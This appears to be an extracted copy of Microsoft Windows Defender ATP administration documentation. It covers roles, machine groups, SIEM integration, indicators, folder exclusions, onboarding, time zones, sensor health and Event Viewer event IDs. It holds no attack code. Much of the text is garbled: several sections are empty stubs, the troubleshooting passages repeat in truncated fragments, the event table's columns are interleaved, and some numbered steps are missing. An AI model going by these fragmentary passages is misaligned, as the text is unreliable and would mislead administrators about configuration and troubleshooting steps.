The following steps guide you on how to create roles in Windows Defender Security Center. It assumes
that you have already created Azure Active Directory user groups.
1. In the navigation pane, select Settings > Roles.
2. Click Add role.
3. Enter the role name, description, and permissions you'd like to assign to the role.
Role name
Description
Permissions
View data - Users can view information in the portal.
Alerts investigation - Users can manage alerts, initiate automated investigations,
collect investigation packages, manage machine tags, and export machine timeline.
Active remediation actions - Users can take response actions and approve or dismiss
pending remediation actions.
Manage portal system settings - Users can configure storage settings, SIEM and
threat intel API settings (applies globally), advanced settings, automated file
uploads, roles and machine groups.
NOTE
This setting is only available in the Windows Defender ATP administrator (default) role.
Manage security settings - Users can configure alert suppression settings,

manage allowed/blocked lists for automation, manage folder exclusions for
automation, onboard and offboard machines, and manage email notifications.
4. Click Next to assign the role to an Azure AD group.
5. Use the filter to select the Azure AD group that you'd like to add to this role.
7. Apply the configuration settings.
After creating roles, you'll need to create a machine group and provide access to the machine group by
assigning it to a role that you just created.
Edit roles
1. Select the role you'd like to edit.
2. Click Edit.
3. Modify the details or the groups that are assigned to the role.
Delete roles
1. Select the role you'd like to delete.
2. Click the drop-down button and select Delete role.
Related topic
User basic permissions to access the portal
Create and manage machine groups
Create and manage machine groups in
Applies to:
Office 365
In an enterprise scenario, security operation teams are typically assigned a set of machines. These
machines are grouped together based on a set of attributes such as their domains, computer names, or
designated tags.
In Windows Defender ATP, you can create machine groups and use them to:
Limit access to related alerts and data to specific Azure AD user groups with assigned RBAC roles
Configure different auto-remediation settings for different sets of machines
TIP
For a comprehensive look into RBAC application, read: Is your SOC running flat with RBAC.
As part of the process of creating a machine group, you'll:

Set the automated remediation level for that group. For more information on remediation levels, see
Use Automated investigation to investigate and remediate threats.
Specify the matching rule that determines which machine group belongs to the group based on the
machine name, domain, tags, and OS platform. If a machine is also matched to other groups, it is
added only to the highest ranked machine group.
Select the Azure AD user group that should have access to the machine group.
Rank the machine group relative to other groups after it is created.
NOTE
A machine group is accessible to all users if you don’t assign any Azure AD groups to it.
Create a machine group

1. In the navigation pane, select Settings > Machine groups.
2. Click Add machine group.
3. Enter the group name and automation settings and specify the matching rule that determines
which machines belong to the group.
Machine group name
Automation level
Semi - require approval for any remediation
Semi - require approval for non-temp folders remediation
Semi - require approval for core folders remediation
Full - remediate threats automatically
NOTE
For more information on automation levels, see Understand the Automated investigation
flow.
Description
Members
TIP
If you want to group machines by organizational unit, you can configure the registry key for the group
affiliation. For more information on device tagging, see Manage machine group and tags.
4. Preview several machines that will be matched by this rule. If you are satisfied with the rule, click
the Access tab.
5. Assign the user groups that can access the machine group you created.
NOTE
You can only grant access to Azure AD user groups that have been assigned to RBAC roles.
6. Click Close. The configuration changes are applied.
Manage machine groups

You can promote or demote the rank of a machine group so that it is given higher or lower priority
during matching. When a machine is matched to more than one group, it is added only to the highest
ranked group. You can also edit and delete groups.
WARNING
Deleting a machine group may affect email notification rules. If a machine group is configured under an email
notification rule, it will be removed from that rule. If the machine group is the only group configured for an email
notification, that email notification rule will be deleted along with the machine group.
By default, machine groups are accessible to all users with portal access. You can change the default
behavior by assigning Azure AD user groups to the machine group.
Machines that are not matched to any groups are added to Ungrouped machines (default) group. You
cannot change the rank of this group or delete it. However, you can change the remediation level of this
group, and define the Azure AD user groups that can access this group.
NOTE
Applying changes to machine group configuration may take up to several minutes.
Related topic
Manage portal access using role-based based access control
Get list of tenant machine groups using Graph API
You can create machine groups in the context of role-based access (RBAC ) to control who can take specific action
or who can see information on a specific machine group or groups by assigning the machine group to a user
group. For more information, see Manage portal access using role-based access control.
By using the portal

NOTE
Windows Server 2016
NOTE

following views:
section.
Manage machine tags
Enable the custom threat intelligence API in
Applies to:
Before you can create custom threat intelligence (TI) using REST API, you'll need to set up the custom threat
intelligence application through Windows Defender Security Center.
1. In the navigation pane, select Settings > Threat intel.
2. Select Enable threat intel API. This activates the Azure Active Directory application setup sections
with pre-populated values.
WARNING

You’ll need to use the access token in the Authorization header when doing REST API calls.
Related topics
Applies to:
Enable security information and event management (SIEM ) integration so you can pull alerts from Windows
Defender Security Center using your SIEM solution or by connecting directly to the alerts REST API.
Prerequisites
The user who activates the setting must have permissions to create an app in Azure Active Directory (AAD ).
This is typically someone with a Global administrator role.
During the initial activation, a pop-up screen is displayed for credentials to be entered. Make sure that you
allow pop-ups for this site.
Enabling SIEM integration

1. In the navigation pane, select Settings > SIEM.
TIP
If you encounter an error when trying to enable the SIEM connector application, check the pop-up blocker
settings of your browser. It might be blocking the new window being opened when you enable the capability.
2. Select Enable SIEM integration. This activates the SIEM connector access details section with pre-
populated values and an application is created under you Azure Active Directory (AAD ) tenant.
WARNING
3. Choose the SIEM type you use in your organization.
NOTE
If you select HP ArcSight, you'll need to save these two configuration files:
WDATP-connector.jsonparser.properties
WDATP-connector.properties
If you want to connect directly to the alerts REST API through programmatic access, choose Generic
API.
NOTE
You'll need to generate a new Refresh token every 90 days.
You can now proceed with configuring your SIEM solution or connecting to the alerts REST API through
programmatic access. You'll need to use the tokens when configuring your SIEM solution to allow it to receive
alerts from Windows Defender Security Center.
Integrate Windows Defender ATP with IBM QRadar
You can configure IBM QRadar to collect alerts from Windows Defender ATP. For more information, see IBM
Knowledge Center.
Related topics
Applies to:
There might be scenarios where you need to suppress alerts from appearing in the portal. You can create
suppression rules for specific alerts that are known to be innocuous such as known tools or processes in your
organization. For more information on how to suppress alerts, see Suppress alerts.
You can view a list of all the suppression rules and manage them in one place. You can also turn an alert
suppression rule on or off.
Turn a suppression rule on or off

1. In the navigation pane, select Settings > Alert suppression. The list of suppression rules that users in your
organization have created is displayed.
2. Select a rule by clicking on the check-box beside the rule name.
3. Click Turn rule on or Turn rule off.
View details of a suppression rule

1. In the navigation pane, select Settings > Alert suppression. The list of suppression rules that users in your
organization have created is displayed.
2. Click on a rule name. Details of the rule is displayed. You'll see the rule details such as status, scope, action,
number of matching alerts, created by, and date when the rule was created. You can also view associated
alerts and the rule conditions.
Related topics
Manage alerts
Applies to:
Create a rule to control which entities are automatically incriminated or exonerated during Automated
investigations.
Entities added to the allowed list are considered safe and will not be analyzed during Automated investigations.
Entities added to the blocked list are considered malicious and will be remediated during Automated
investigations.
You can define the conditions for when entities are identified as malicious or safe based on certain attributes such
as hash values or certificates.
Create an allowed or blocked list

1. In the navigation pane, select Settings > Automation allowed/blocked list.
2. Select the tab of the type of entity you'd like to create an exclusion for. Currently, you can add a rule for
certificates.
3. Select Add allowed/blocked list rule.
4. For each attribute specify the exclusion type, details, and their corresponding required values.
5. Click Add rule.
Edit a list
2. Select the tab of the entity type you'd like to edit the list from.
3. Update the details of the rule and click Update rule.
Delete a list
2. Select the tab of the entity type you'd like to delete the list from.
3. Select the list type by clicking the check-box beside the list type.
4. Click Delete.
Related topics
Manage allowed/blocked lists
Manage indicators
Applies to:
IMPORTANT
Create indicators that define the detection, prevention, and exclusion of entities. You can define the action to be
taken as well as the duration for when to apply the action as well as the scope of the machine group to apply it to.
Import a list
Add an indicator
Export the entire list in CSV format
Apply filters
Create an indicator
1. In the navigation pane, select Settings > Allowed/blocked list.
2. Select the tab of the type of entity you'd like to create an indicator for. You can choose any of the following
entities:
File hash
IP address
URLs/Domains
3. Click Add indicator.
4. For each attribute specify the following details:
Indicator - Specify the entity details and define the expiration of the indicator.
Action - Specify the action to be taken and provide a description.
Scope - Define the scope of the machine group.
5. Review the details in the Summary tab, then click Save.
NOTE
Blocking IPs, domains, or URLs is currently available on limited preview only. This requires sending your custom list to
network protection to be enforced which is an option that will be generally available soon. As it is not yet generally available,
when Automated investigations finds this indicator during an investigation it will use the allowed/block list as the basis of its
decision to automatically remediate (blocked list) or skip (allowed list) the entity.
Manage indicators
1. In the navigation pane, select Settings > Allowed/blocked list.
2. Select the tab of the entity type you'd like to manage.
3. Update the details of the indicator and click Save or click the Delete button if you'd like to remove the
entity from the list.
Import a list
You can also choose to upload a CSV file that defines the attributes of indicators, the action to be taken, and other
details.
Download the sample CSV to know the supported column attributes.
Related topics
Applies to:
Enable the content analysis capability so that certain files and email attachments can automatically be uploaded to
the cloud for additional inspection in Automated investigation.
Identify the files and email attachments by specifying the file extension names and email attachment extension
names.
For example, if you add exe and bat as file or attachment extension names, then all files or attachments with those
extensions will automatically be sent to the cloud for additional inspection during Automated investigation.
Add file extension names and attachment extension names.

1. In the navigation pane, select Settings > Automation file uploads.
2. Toggle the content analysis setting between On and Off.
3. Configure the following extension names and separate extension names with a comma:
File extension names - Suspicious files except email attachments will be submitted for additional
inspection
Related topics
Applies to:
Automation folder exclusions allow you to specify folders that the Automated investigation will skip.
You can control the following attributes about the folder that you'd like to be skipped:
Folders
Extensions of the files
File names
Folders
You can specify a folder and its subfolders to be skipped. You can use wild cards so that all files under the directory
is skipped by the automated investigation.
Extensions
You can specify the extensions to exclude in a specific directory. The extensions are a way to prevent an attacker
from using an excluded folder to hide an exploit. The extensions explicitly define which files to ignore.
File names
You can specify the file names that you want to be excluded in a specific directory. The names are a way to prevent
an attacker from using an excluded folder to hide an exploit. The names explicitly define which files to ignore.
Add an automation folder exclusion

1. In the navigation pane, select Settings > Automation folder exclusions.
2. Click New folder exclusion.
3. Enter the folder details:
Folder
Extensions
File names
Description
4. Click Save.
Edit an automation folder exclusion

2. Click Edit on the folder exclusion.
3. Update the details of the rule and click Save.
Remove an automation folder exclusion

2. Click Remove exclusion.
Related topics
Onboard machines to the Windows Defender ATP
service
Applies to:
You need to turn on the sensor to give visibility within Windows Defender ATP.
For more information, see Onboard your Windows 10 machines to Windows Defender ATP.
IMPORTANT
Hardware and software requirements

Supported Windows versions
Windows 7 SP1 Pro
Windows 8.1 Pro
Windows 10 Enterprise
Windows 10 Education
Windows 10 Pro
Windows 10 Pro Education
Windows server
Windows Server 2016
Windows Server 2016, version 1803
Windows Server 2019
Machines on your network must be running one of these editions.
The hardware requirements for Windows Defender ATP on machines is the same as those for the supported
editions.
NOTE
Machines that are running mobile versions of Windows are not supported.
Other supported operating systems

macOSX
Linux
NOTE
You'll need to know the exact Linux distros and macOS versions that are compatible with Windows Defender ATP for the
integration to work.
Network and data storage and configuration requirements

When you run the onboarding wizard for the first time, you must choose where your Windows Defender
Advanced Threat Protection-related information is stored: in the European Union, the United Kingdom, or the
United States datacenter.
NOTE
You cannot change your data storage location after the first-time setup.
Review the Windows Defender ATP data storage and privacy for more information on where and how Microsoft stores
your data.
Diagnostic data settings

You must ensure that the diagnostic data service is enabled on all the machines in your organization. By default,
this service is enabled, but it's good practice to check to ensure that you'll get sensor data from them.
sc qc diagtrack
If the START_TYPE is not set to AUTO_START, then you'll need to set the service to automatically start.
1. Open an elevated command-line prompt on the endpoint:
sc qc diagtrack
Internet connectivity
Internet connectivity on machines is required either directly or through proxy.
The Windows Defender ATP sensor can utilize a daily average bandwidth of 5MB to communicate with the
Windows Defender ATP cloud service and report cyber data. One-off activities such as file uploads and
investigation package collection are not included in this daily average bandwidth.
For more information on additional proxy configuration settings see, Configure machine proxy and Internet
connectivity settings .
Before you onboard machines, the diagnostic data service must be enabled. The service is enabled by default in
Windows 10.
Windows Defender Antivirus configuration requirement

The Windows Defender ATP agent depends on the ability of Windows Defender Antivirus to scan files and
provide information about them.
You must configure Security intelligence updates on the Windows Defender ATP machines whether Windows
Defender Antivirus is the active antimalware or not. For more information, see Manage Windows Defender
Antivirus updates and apply baselines.
When Windows Defender Antivirus is not the active antimalware in your organization and you use the Windows
Defender ATP service, Windows Defender Antivirus goes on passive mode. If your organization has disabled
Windows Defender Antivirus through group policy or other methods, machines that are onboarded to Windows
Defender ATP must be excluded from this group policy.
If you are onboarding servers and Windows Defender Antivirus is not the active antimalware on your servers,
you shouldn't uninstall Windows Defender Antivirus. You'll need to configure it to run on passive mode. For
more information, see Onboard servers.
For more information, see Windows Defender Antivirus compatibility.
Windows Defender Antivirus Early Launch Antimalware (ELAM) driver

is enabled
If you're running Windows Defender Antivirus as the primary antimalware product on your machines, the
Windows Defender ATP agent will successfully onboard.
If you're running a third-party antimalware client and use Mobile Device Management solutions or System
Center Configuration Manager (current branch) version 1606, you'll need to ensure that the Windows Defender
Antivirus ELAM driver is enabled. For more information, see Ensure that Windows Defender Antivirus is not
disabled by policy.
In this section
TOPIC DESCRIPTION
Onboard previous versions of Windows Onboard Windows 7 and Windows 8.1 machines to Windows
Defender ATP.
Onboard Windows 10 machines You'll need to onboard machines for it to report to the
Windows Defender ATP service. Learn about the tools and
methods you can use to configure machines in your
enterprise.
Onboard servers Onboard Windows Server 2012 R2 and Windows Server

2016 to Windows Defender ATP
Onboard non-Windows machines Windows Defender ATP provides a centralized security

operations experience for Windows as well as non-Windows
platforms. You'll be able to see alerts from various supported
operating systems (OS) in Windows Defender Security Center
and better protect your organization's network. This
experience leverages on a third-party security products'
sensor data.
Run a detection test on a newly onboarded machine Run a script on a newly onboarded machine to verify that it is
properly reporting to the Windows Defender ATP service.
Configure proxy and Internet settings Enable communication with the Windows Defender ATP cloud
service by configuring the proxy and Internet connectivity
settings.
Troubleshoot onboarding issues Learn about resolving issues that might arise during
onboarding.

Offboard machines from the Windows Defender ATP
service
Applies to:
macOS
Linux
Windows Server 2016
Follow the corresponding instructions depending on your preferred deployment method.
Offboard Windows 10 machines

Offboard machines using a local script
Offboard machines using Group Policy
Offboard machines using System Center Configuration Manager
Offboard machines using Mobile Device Management tools
Offboard Servers
Offboard servers

Windows Defender Security Center time zone
settings
Applies to:
Use the Time zone menu to configure the time zone and view license information.
Time zone settings

The aspect of time is important in the assessment and analysis of perceived and actual cyberattacks.
Cyberforensic investigations often rely on time stamps to piece together the sequence of events. It’s important that
your system reflects the correct time zone settings.
Windows Defender ATP can display either Coordinated Universal Time (UTC ) or local time.
Your current time zone setting is shown in the Windows Defender ATP menu. You can change the displayed time
zone in the Time zone menu .
UTC time zone
Windows Defender ATP uses UTC time by default.
Setting the Windows Defender ATP time zone to UTC will display all system timestamps (alerts, events, and others)
in UTC for all users. This can help security analysts working in different locations across the globe to use the same
time stamps while investigating events.
Local time zone
You can choose to have Windows Defender ATP use local time zone settings. All alerts and events will be displayed
using your local time zone.
The local time zone is taken from your machine’s regional settings. If you change your regional settings, the
Windows Defender ATP time zone will also change. Choosing this setting means that the timestamps displayed in
Windows Defender ATP will be aligned to local time for all Windows Defender ATP users. Analysts located in
different global locations will now see the Windows Defender ATP alerts according to their regional settings.
Choosing to use local time can be useful if the analysts are located in a single location. In this case it might be
easier to correlate events to local time, for example – when a local user clicked on a suspicious email link.
Set the time zone
The Windows Defender ATP time zone is set by default to UTC. Setting the time zone also changes the times for all
Windows Defender ATP views. To set the time zone:
1. Click the Time zone menu .

2. Select the Timezone UTC indicator.
3. Select Timezone UTC or your local time zone, for example -7:00.
Regional settings
To apply different date formats for Windows Defender ATP, use regional settings for Internet Explorer (IE ) and
Microsoft Edge (Edge). If you're using another browser such as Google Chrome, follow the required steps to
change the time and date settings for that browser.
Internet Explorer (IE ) and Microsoft Edge
IE and Microsoft Edge use the Region settings configured in the Clocks, Language, and Region option in the
Control panel.
Known issues with regional formats
Date and time formats
There are some known issues with the time and date formats.
The following date formats are supported:
MM/dd/yyyy
dd/MM/yyyy
The following date and time formats are currently not supported:
Date format yyyy-MM -dd
Date format dd-MMM -yy
Date format dd/MM/yy
Date format MM/dd/yy
Date format with yy. Will only show yyyy.
Time format HH:mm:ss is not supported (the 12 hour AM/PM format is not supported). Only the 24-hour
format is supported.
Decimal symbol used in numbers
Decimal symbol used is always a dot, even if a comma is selected in the Numbers format settings in Region
settings. For example, 15,5K is displayed as 15.5K.
Troubleshoot Windows Defender Advanced Threat
Protection
Troubleshoot issues that might arise as you use Windows Defender ATP capabilities.
In this section
TOPIC DESCRIPTION
Troubleshoot sensor state Find solutions for issues related to the Windows Defender ATP
sensor
Troubleshoot service issues Fix issues related to the Windows Defender Advanced Threat
service
Troubleshoot attack surface reduction Fix issues related to network protection and attack surface
reduction rules
Troubleshoot next generation protection If you encounter a problem with antivirus, you can search the
tables in this topic to find a matching issue and potential
solution
Check sensor health state in Windows Defender ATP
Applies to:
The sensor health tile provides information on the individual machine’s ability to provide sensor data and
communicate with the Windows Defender ATP service. It reports how many machines require attention and helps
you identify problematic machines and take action to correct known issues.
There are two status indicators on the tile that provide information on the number of machines that are not
reporting properly to the service:
Misconfigured - These machines might partially be reporting sensor data to the Windows Defender ATP
service and might have configuration errors that need to be corrected.
Inactive - Machines that have stopped reporting to the Windows Defender ATP service for more than seven
days in the past month.
Clicking any of the groups directs you to Machines list, filtered according to your choice.
You can also download the entire list in CSV format using the Export to CSV feature. For more information on
filters, see View and organize the Machines list.
You can filter the health state list by the following status:
Active - Machines that are actively reporting to the Windows Defender ATP service.
Misconfigured - These machines might partially be reporting sensor data to the Windows Defender ATP
service but have configuration errors that need to be corrected. Misconfigured machines can have either one or
a combination of the following issues:
No sensor data - Machines has stopped sending sensor data. Limited alerts can be triggered from the
machine.
Impaired communications - Ability to communicate with machine is impaired. Sending files for deep
analysis, blocking files, isolating machine from network and other actions that require communication
with the machine may not work.
Inactive - Machines that have stopped reporting to the Windows Defender ATP service.
You can view the machine details when you click on a misconfigured or inactive machine. You’ll see more specific
machine information when you click the information icon.
In the Machines list, you can download a full list of all the machines in your organization in a CSV format.
NOTE
Export the list in CSV format to display the unfiltered data. The CSV file will include all machines in the organization,
regardless of any filtering applied in the view itself and can take a significant amount of time to download, depending on
how large your organization is.
Related topic
Fix unhealthy sensors in Windows Defender ATP
Applies to:
Machines that are categorized as misconfigured or inactive can be flagged due to varying causes. This section
provides some explanations as to what might have caused a machine to be categorized as inactive or
misconfigured.
Inactive machines
An inactive machine is not necessarily flagged due to an issue. The following actions taken on a machine can cause
a machine to be categorized as inactive:
Machine is not in use
If the machine has not been in use for more than 7 days for any reason, it will remain in an ‘Inactive’ status in the
portal.
Machine was reinstalled or renamed
A reinstalled or renamed machine will generate a new machine entity in Windows Defender Security Center. The
previous machine entity will remain with an ‘Inactive’ status in the portal. If you reinstalled a machine and deployed
the Windows Defender ATP package, search for the new machine name to verify that the machine is reporting
normally.
Machine was offboarded
If the machine was offboarded it will still appear in machines list. After 7 days, the machine health state should
change to inactive.
Machine is not sending signals If the machine is not sending any signals for more than 7 days to any of the
Windows Defender ATP channels for any reason including conditions that fall under misconfigured machines
classification, a machine can be considered inactive.
Do you expect a machine to be in ‘Active’ status? Open a support ticket.
Misconfigured machines can further be classified to:
No sensor data
This status indicates that there's limited communication between the machine and the service.
The following suggested actions can help fix issues related to a misconfigured machine with impaired
communications:
Ensure the machine has Internet connection
The Window Defender ATP sensor requires Microsoft Windows HTTP (WinHTTP ) to report sensor data and
Verify the proxy configuration completed successfully, that WinHTTP can discover and communicate
through the proxy server in your environment, and that the proxy server allows traffic to the Windows
Defender ATP service URLs.
If you took corrective actions and the machine status is still misconfigured, open a support ticket.
No sensor data
A misconfigured machine with status ‘No sensor data’ has communication with the service but can only report
partial sensor data. Follow theses actions to correct known issues related to a misconfigured machine with status
‘No sensor data’:
If the machines aren't reporting correctly, you might need to check that the Windows 10 diagnostic data
service is set to automatically start and is running on the endpoint.
Ensure that Windows Defender Antivirus is not disabled by policy
If your machines are running a third-party antimalware client, the Windows Defender ATP agent needs the
Windows Defender Antivirus Early Launch Antimalware (ELAM ) driver to be enabled.
Related topic
Applies to:
misconfigured.
Inactive machines
An inactive machine is not necessarily flagged due to an issue. The following actions taken on a machine can cause
a machine to be categorized as inactive:
portal.
previous machine entity will remain with an ‘Inactive’ status in the portal. If you reinstalled a machine and deployed
the Windows Defender ATP package, search for the new machine name to verify that the machine is reporting
normally.
change to inactive.
No sensor data
communications:
No sensor data
If your machines are running a third-party antimalware client, the Windows Defender ATP agent needs the
Windows Defender Antivirus Early Launch Antimalware (ELAM ) driver to be enabled.
Related topic
Applies to:
misconfigured.
Inactive machines
An inactive machine is not necessarily flagged due to an issue. The following actions taken on a machine can
cause a machine to be categorized as inactive:
portal.
previous machine entity will remain with an ‘Inactive’ status in the portal. If you reinstalled a machine and
deployed the Windows Defender ATP package, search for the new machine name to verify that the machine is
reporting normally.
change to inactive.
No sensor data
communications:
The Window Defender ATP sensor requires Microsoft Windows HTTP (WinHTTP ) to report sensor data
and communicate with the Windows Defender ATP service.
No sensor data
The Window Defender ATP sensor requires Microsoft Windows HTTP (WinHTTP ) to report sensor data
and communicate with the Windows Defender ATP service.
If your machines are running a third-party antimalware client, the Windows Defender ATP agent needs
the Windows Defender Antivirus Early Launch Antimalware (ELAM ) driver to be enabled.
Related topic
Review events and errors using Event Viewer
Applies to:
Event Viewer
You can review event IDs in the Event Viewer on individual machines.
For example, if machines are not appearing in the Machines list, you might need to look for event IDs on the
machines. You can then use this table to determine further troubleshooting steps.
NOTE
It can take several days for machines to begin reporting to the Windows Defender ATP service.
Open Event Viewer and find the Windows Defender ATP service event log:
1. Click Start on the Windows menu, type Event Viewer, and press Enter.
2. In the log list, under Log Summary, scroll until you see Microsoft-Windows-SENSE/Operational.
Double-click the item to open the log.
a. You can also access the log by expanding Applications and Services Logs > Microsoft > Windows >
SENSE and click on Operational.
NOTE
SENSE is the internal name used to refer to the behavioral sensor that powers Windows Defender ATP.
3. Events recorded by the service will appear in the log. See the following table for a list of events recorded by
the service.
EVENT ID MESSAGE DESCRIPTION ACTION
1 Windows Defender Occurs during system start Normal operating

Advanced Threat Protection up, shut down, and during notification; no action
service started (Version onbboarding. required.
variable ).
2 Windows Defender Occurs when the machine is Normal operating

Advanced Threat Protection shut down or offboarded. notification; no action
service shutdown. required.
3 Windows Defender Service did not start. Review other messages to

Advanced Threat Protection determine possible cause
service failed to start. Failure and troubleshooting steps.
code: variable .
4 Windows Defender Variable = URL of the Normal operating
Advanced Threat Protection Windows Defender ATP notification; no action
service contacted the server processing servers. required.
at variable . This URL will match that
seen in the Firewall or
network activity.
5 Windows Defender Variable = URL of the Check the connection to the

Advanced Threat Protection Windows Defender ATP URL. See Configure proxy
service failed to connect to processing servers. and Internet connectivity.
the server at variable . The service could not
contact the external
processing servers at that
URL.
6 Windows Defender The machine did not Onboarding must be run

Advanced Threat Protection onboard correctly and will before starting the service.
service is not onboarded not be reporting to the Check that the onboarding
and no onboarding portal. settings and scripts were
parameters were found. deployed properly. Try to
redeploy the configuration
packages.
See Onboard Windows 10
machines.
7 Windows Defender Variable = detailed error Check that the onboarding

Advanced Threat Protection description. The machine did settings and scripts were
service failed to read the not onboard correctly and deployed properly. Try to
onboarding parameters. will not be reporting to the redeploy the configuration
Failure: variable . portal. packages.
machines.
8 Windows Defender During onboarding: The Onboarding: No action

Advanced Threat Protection service failed to clean its required.
service failed to clean its configuration during the
configuration. Failure code: onboarding. The onboarding Offboarding: Reboot the
variable . process continues. system.
During offboarding: The machines.
service failed to clean its
configuration during the
offboarding. The offboarding
process finished but the
service keeps running.
9 Windows Defender During onboarding: The Check that the onboarding

Advanced Threat Protection machine did not onboard settings and scripts were
service failed to change its correctly and will not be deployed properly. Try to
start type. Failure code: reporting to the portal. redeploy the configuration
variable . packages.
During offboarding: Failed See Onboard Windows 10
to change the service start machines.
type. The offboarding
process continues.
10 Windows Defender The machine did not Check that the onboarding
Advanced Threat Protection onboard correctly and will settings and scripts were
service failed to persist the not be reporting to the deployed properly. Try to
onboarding information. portal. redeploy the configuration
Failure code: variable . packages.
machines.
11 Onboarding or re- The machine onboarded Normal operating

onboarding of Windows correctly. notification; no action
Defender Advanced Threat required.
Protection service It may take several hours for
completed. the machine to appear in
the portal.
12 Windows Defender Service was unable to apply This error should resolve
Advanced Threat Protection the default configuration. after a short period of time.
failed to apply the default
configuration.
13 Windows Defender Normal operating process. Normal operating

Advanced Threat Protection notification; no action
machine ID calculated: required.
variable .
15 Windows Defender Variable = URL of the Check the connection to the

Advanced Threat Protection Windows Defender ATP URL. See Configure proxy
cannot start command processing servers. and Internet connectivity.
channel with URL: The service could not
variable . contact the external
processing servers at that
URL.
17 Windows Defender An error occurred with the Ensure the diagnostic data
Advanced Threat Protection Windows telemetry service. service is enabled.
service failed to change the Check that the onboarding
Connected User Experiences settings and scripts were
and Telemetry service deployed properly. Try to
location. Failure code: redeploy the configuration
variable . packages.
machines.
18 OOBE (Windows Welcome) Service will only start after Normal operating
is completed. any Windows updates have notification; no action
finished installing. required.
19 OOBE (Windows Welcome) Service will only start after Normal operating
has not yet completed. any Windows updates have notification; no action
finished installing. required.
If this error persists after a
system restart, ensure all
Windows updates have full
installed.
20 Cannot wait for OOBE Internal error. If this error persists after a
(Windows Welcome) to system restart, ensure all
complete. Failure code: Windows updates have full
variable . installed.
Advanced Threat Protection onboard correctly. It will settings and scripts were
service failed to reset health report to the portal, deployed properly. Try to
status in the registry. Failure however the service may redeploy the configuration
code: variable . not appear as registered in packages.
SCCM or the registry. See Onboard Windows 10
machines.
Advanced Threat Protection onboard correctly. settings and scripts were
service failed to set the It will report to the portal, deployed properly. Try to
onboarding status in the however the service may redeploy the configuration
registry. Failure code: not appear as registered in packages.
variable . SCCM or the registry. See Onboard Windows 10
machines.
27 Windows Defender Normally, Windows Check that the onboarding

Advanced Threat Protection Defender Antivirus will enter settings and scripts were
service failed to enable a special passive state if deployed properly. Try to
SENSE aware mode in another real-time redeploy the configuration
Windows Defender antimalware product is packages.
Antivirus. Onboarding running properly on the See Onboard Windows 10
process failed. Failure code: machine, and the machine is machines.
variable . reporting to Windows Ensure real-time
Defender ATP. antimalware protection is
running properly.
Connected User Experiences Check that the onboarding
and Telemetry service settings and scripts were
registration failed. Failure deployed properly. Try to
code: variable . redeploy the configuration
packages.
machines.
29 Failed to read the This event occurs when the Ensure the machine has
offboarding parameters. system can't read the Internet access, then run the
Error type: %1, Error code: offboarding parameters. entire offboarding process
%2, Description: %3 again.
30 Windows Defender Normally, Windows Check that the onboarding

Advanced Threat Protection Defender Antivirus will enter settings and scripts were
service failed to disable a special passive state if deployed properly. Try to
SENSE aware mode in another real-time redeploy the configuration
Windows Defender antimalware product is packages.
Antivirus. Failure code: running properly on the See Onboard Windows 10
variable . machine, and the machine is machines
reporting to Windows Ensure real-time
Defender ATP. antimalware protection is
running properly.
31 Windows Defender An error occurred with the Check for errors with the
Advanced Threat Protection Windows telemetry service Windows telemetry service.
Connected User Experiences during onboarding. The
and Telemetry service offboarding process
unregistration failed. Failure continues.
code: variable .
32 Windows Defender An error occurred during Reboot the machine.
Advanced Threat Protection offboarding.
service failed to request to
stop itself after offboarding
process. Failure code: %1
33 Windows Defender A unique identifier is used to Check registry permissions

Advanced Threat Protection represent each machine that on the machine to ensure
service failed to persist is reporting to the portal. the service can update the
SENSE GUID. Failure code: If the identifier does not registry.
variable . persist, the same machine
might appear twice in the
portal.
service failed to add itself as Check that the onboarding
a dependency on the settings and scripts were
Connected User Experiences deployed properly. Try to
and Telemetry service, redeploy the configuration
causing onboarding process packages.
to fail. Failure code: See Onboard Windows 10
variable . machines.
35 Windows Defender An error occurred with the Check for errors with the
Advanced Threat Protection Windows telemetry service Windows diagnostic data
service failed to remove during offboarding. The service.
itself as a dependency on offboarding process
the Connected User continues.
Experiences and Telemetry
service. Failure code:
variable .
36 Windows Defender Registering Windows Normal operating

Advanced Threat Protection Defender Advanced Threat notification; no action
Connected User Experiences Protection with the required.
and Telemetry service Connected User Experiences
registration succeeded. and Telemetry service
Completion code: completed successfully.
variable .
37 Windows Defender The machine has almost Normal operating

Advanced Threat Protection used its allocated quota of notification; no action
A module is about to exceed the current 24-hour window. required.
its quota. Module: %1, It’s about to be throttled.
Quota: {%2} {%3},
Percentage of quota
utilization: %4.
38 Network connection is The machine is using a Normal operating

identified as low. Windows metered/paid network and notification; no action
Defender Advanced Threat will be contacting the server required.
Protection will contact the less frequently.
server every %1 minutes.
Metered connection: %2,
internet available: %3, free
network available: %4.
39 Network connection is The machine is not using a Normal operating
identified as normal. metered/paid connection notification; no action
Windows Defender and will contact the server required.
Advanced Threat Protection as usual.
will contact the server every
%1 minutes. Metered
connection: %2, internet
available: %3, free network
available: %4.
40 Battery state is identified as The machine has low battery Normal operating
low. Windows Defender level and will contact the notification; no action
Advanced Threat Protection server less frequently. required.
%1 minutes. Battery state:
%2.
41 Battery state is identified as The machine doesn’t have Normal operating

normal. Windows Defender low battery level and will notification; no action
Advanced Threat Protection contact the server as usual. required.
%1 minutes. Battery state:
%2.
42 Windows Defender Internal error. The service If this error persists, contact
Advanced Threat Protection failed to start. Support.
WDATP component failed to
perform action. Component:
%1, Action: %2, Exception
Type: %3, Exception
message: %4
43 Windows Defender Internal error. The service If this error persists, contact
Advanced Threat Protection failed to start. Support.
WDATP component failed to
perform action. Component:
%1, Action: %2, Exception
Type: %3, Exception Error:
%4, Exception message: %5
44 Offboarding of Windows The service was offboarded. Normal operating

Defender Advanced Threat notification; no action
Protection service required.
completed.
45 Failed to register and to An error occurred on service If this error persists, contact
start the event trace session startup while creating ETW Support.
[%1]. Error code: %2 session. This caused service
start-up failure.
46 Failed to register and start An error occurred on service Normal operating

the event trace session [%1] startup while creating ETW notification; no action
due to lack of resources. session due to lack of required. The service will try
Error code: %2. This is most resources. The service to start the session every
likely because there are too started and is running, but minute.
many active event trace will not report any sensor
sessions. The service will event until the ETW session
retry in 1 minute. is started.
47 Successfully registered and This event follows the Normal operating
started the event trace previous event after notification; no action
session - recovered after successfully starting of the required.
previous failed attempts. ETW session.
48 Failed to add a provider [%1] Failed to add a provider to Check the error code. If the
to event trace session [%2]. ETW session. As a result, the error persists contact
Error code: %3. This means provider events aren’t Support.
that events from this reported.
provider will not be
reported.
Related topics
Configure machine proxy and Internet connectivity settings
Troubleshoot service issues
This section addresses issues that might arise as you use the Windows Defender Advanced Threat service.
Server error - Access is denied due to invalid credentials

If you encounter a server error when trying to access the service, you’ll need to change your browser cookie
settings. Configure your browser to allow cookies.
Elements or data missing on the portal

